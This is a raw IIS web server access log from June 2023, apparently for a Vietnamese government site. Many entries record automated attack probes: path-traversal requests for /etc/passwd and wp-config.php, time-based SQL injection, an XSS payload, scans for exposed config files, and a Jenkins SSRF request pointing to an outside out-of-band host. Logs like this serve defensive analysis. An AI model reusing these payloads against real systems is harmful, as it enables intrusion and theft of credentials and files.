controller=../../../../../../../../../etc/passwd%00&option=com_wmi 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 44 2023-06-27 13:15:51 103.153.214.94 POST /service/rapture/session - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 405 0 1 35 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 13:31:29 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 13:31:29 103.153.214.94 GET /jeecg-boot/actuator/httptrace/ - 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 35 2023-06-27 13:41:49 103.153.214.94 GET /wp-admin/admin-post.php alg_wc_pif_download_file=../../../../../wp-config.php 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 39 2023-06-27 13:50:17 103.153.214.94 GET /ccm/system/panels/page/preview_as_user/preview cID="></iframe><svg/onload=alert("2ReXb1OJIxHL219YcpBbxy8cp4r")> 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 39 2023-06-27 13:51:17 103.153.214.94 GET /xml/User/User.xml - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 36 2023-06-27 13:59:07 103.153.214.94 GET /.travis.yml - 443 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 31 2023-06-27 13:59:07 103.153.214.94 GET /matomo/.travis.yml - 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 43 2023-06-27 14:03:45 103.153.214.94 GET /do/job.php job=download&url=ZGF0YS9jb25maWcucGg8 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 39 2023-06-27 14:10:59 103.153.214.94 POST /index.php a=attemptLogin&m=login 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 32 2023-06-27 14:10:59 103.153.214.94 POST /index.php a=attemptLogin&m=login 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 405 0 1 25 2023-06-27 14:10:59 103.153.214.94 POST /index.php a=attemptLogin&m=login 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 405 0 1 25 2023-06-27 14:10:59 103.153.214.94 POST /index.php a=attemptLogin&m=login 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 405 0 1 32 2023-06-27 14:14:15 103.153.214.94 GET /index.php option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 35 2023-06-27 14:16:27 103.153.214.94 GET /index.php action=edit&f1=.//./\.//./\.//./\.//./\.//./\.//./etc/passwd&page&restore=1 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 43 #Software: Microsoft Internet Information Services 10.0 #Version: 1.0 #Date: 2023-06-27 14:41:35 #Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken 2023-06-27 14:41:35 103.153.214.94 GET /sftp.json - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 831 2023-06-27 14:41:36 103.153.214.94 GET /.config/sftp.json - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 30 2023-06-27 14:41:38 103.153.214.94 GET /.vscode/sftp.json - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 38 2023-06-27 14:44:33 103.153.214.94 GET / - 443 - 198.235.24.239 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 200 0 0 295 2023-06-27 14:52:28 103.153.214.94 POST /users/login - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 405 0 1 36 2023-06-27 14:57:49 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_jukebox 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 42 2023-06-27 14:59:35 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 82 2023-06-27 14:59:35 103.153.214.94 GET /wp-admin/admin.php ID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))test)&page=wps_pages_page&type=home 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 27 2023-06-27 15:08:13 103.153.214.94 GET / wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 31 2023-06-27 15:23:25 103.153.214.94 GET /api/search/attribute tf_version=%27+and+(select%20pg_sleep(10))+ISNULL--&versionid=* 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 0 2 2551 2023-06-27 15:25:29 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=0 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 42 2023-06-27 15:25:30 103.153.214.94 GET /cgi-bin/cosmobdf.cgi function=1 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 34 2023-06-27 15:34:22 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 34 2023-06-27 15:34:22 103.153.214.94 POST / - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 405 0 1 25 2023-06-27 15:34:23 103.153.214.94 GET / p 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 27 2023-06-27 15:34:32 103.153.214.94 GET /deployment-config.json - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 25 2023-06-27 15:46:29 103.153.214.94 GET /pacsone/nocache.php path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2f.%2fzpx%2f..%2fpasswd 443 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 200 0 0 37 2023-06-27 16:01:11 103.153.214.94 GET /scripts/logdownload.php dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 32 2023-06-27 16:12:57 103.153.214.94 GET /index.php action=../../../../../../../../etc/passwd&option=com_agora&page=avatars&task=profile 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 36 2023-06-27 16:13:03 103.153.214.94 GET / - 443 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 200 0 0 28 2023-06-27 16:13:04 103.153.214.94 GET /admin/ - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 182 2023-06-27 16:14:03 103.153.214.94 GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.github.config.GitHubTokenCredentialsCreator/createTokenByPassword apiUrl=http://cibehhqofm2ke57n2m2gihh7pous4gkwt.oast.live 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 61 2023-06-27 16:15:17 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_ultimateportfolio 443 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 32 2023-06-27 16:15:23 103.153.214.94 POST /casmain.xgi - 443 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 405 0 1 29 2023-06-27 16:24:53 103.153.214.94 GET / - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 - 200 0 0 263 2023-06-27 16:24:53 103.153.214.94 GET /runtime-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 206 2023-06-27 16:24:54 103.153.214.94 GET /polyfills-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1293 2023-06-27 16:24:58 103.153.214.94 GET /styles-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 3968 2023-06-27 16:25:22 103.153.214.94 GET /vendor-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 23697 2023-06-27 16:25:24 103.153.214.94 GET /main-es5.js - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1232 2023-06-27 16:25:31 103.153.214.94 GET /data-table.eot - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 178 2023-06-27 16:25:31 103.153.214.94 GET /data-table.eot - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:31 103.153.214.94 GET /data-table.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:31 103.153.214.94 GET /data-table.ttf - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:31 103.153.214.94 GET /data-table.svg - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 174 2023-06-27 16:25:31 103.153.214.94 GET /~@swimlane/ngx-datatable/index.css - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 183 2023-06-27 16:25:32 103.153.214.94 GET /~@swimlane/ngx-datatable/themes/material.scss - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 181 2023-06-27 16:25:32 103.153.214.94 GET /~@swimlane/ngx-datatable/assets/icons.css - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 216 2023-06-27 16:25:32 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:33 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1126 2023-06-27 16:25:35 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 2287 2023-06-27 16:25:37 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1128 2023-06-27 16:25:37 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 742 2023-06-27 16:25:39 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1171 2023-06-27 16:25:39 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6-basic.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 354 2023-06-27 16:25:39 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f-basic.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 350 2023-06-27 16:25:40 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1038 2023-06-27 16:25:40 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:25:41 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b-ext.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 653 2023-06-27 16:25:41 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f-ext.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 352 2023-06-27 16:25:41 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99-ext.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:41 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb-ext.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:41 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44-ext.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 186 2023-06-27 16:25:43 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4-ext.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 356 2023-06-27 16:25:43 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6-ext.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:43 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f-ext.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:43 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117-ext.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 177 2023-06-27 16:25:43 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354-ext.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:43 103.153.214.94 GET /77156710-6a58-4606-b189-b4185e75967b-greek.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:45 103.153.214.94 GET /3d5260a1-e4cd-4567-80ed-69d23c40355f-greek.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 995 2023-06-27 16:25:45 103.153.214.94 GET /77caabd3-1877-4634-85c8-8e398a093b99-greek.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:45 103.153.214.94 GET /e388ac99-8c6a-4451-8690-1d15b4d45adb-greek.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 653 2023-06-27 16:25:46 103.153.214.94 GET /014f2daa-c310-4a36-b9fd-79a8e0c48d44-greek.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 182 2023-06-27 16:25:46 103.153.214.94 GET /12b00842-ec20-4c7f-aa72-802fb00f6cc4-greek.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 653 2023-06-27 16:25:46 103.153.214.94 GET /a1049d00-54ad-4589-95b8-d353f7ab52f0-greek.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 179 2023-06-27 16:25:47 103.153.214.94 GET /13faf0ae-dcab-4d1c-9c08-f9ca339b6023-greek.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 1214 2023-06-27 16:25:47 103.153.214.94 GET /e78b17bb-11fb-4860-8d66-4ee0d0c1e117-greek.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 349 2023-06-27 16:25:48 103.153.214.94 GET /d4ffabb3-dd7c-472a-bdfb-6700383c6354-greek.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 352 2023-06-27 16:25:48 103.153.214.94 GET /174d458a-81e0-4174-9473-35e3bf0a613c.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:48 103.153.214.94 GET /57a79aa3-9b06-4ba7-a9a4-2b766d826ecf.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 177 2023-06-27 16:25:48 103.153.214.94 GET /7db1f672-3a8f-4d19-9c49-7f61aed450b5.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:48 103.153.214.94 GET /4ab86b35-c0c2-42b5-98ad-4b6eba66b197.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 176 2023-06-27 16:25:48 103.153.214.94 GET /b17468ea-cf53-4635-984b-4d930a68ed4d.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 179 2023-06-27 16:25:49 103.153.214.94 GET /4d1d0d0d-9ea6-4117-901f-8b32ca1ab936.woff - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 175 2023-06-27 16:25:50 103.153.214.94 GET /b0b84e4d-2164-45c7-a674-1662f19f3ba6.woff2 - 443 - 198.199.96.73 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/86.0.4240.111+Safari/537.36 https://bcvt.kontum.gov.vn/ 200 0 0 997 2023-06-27 16:25:50 103.153.214.94 GET /e91d1bbf-3fea-45e2-b003-a22b12ce6e5f.woff - 443 - 198.199.96.73 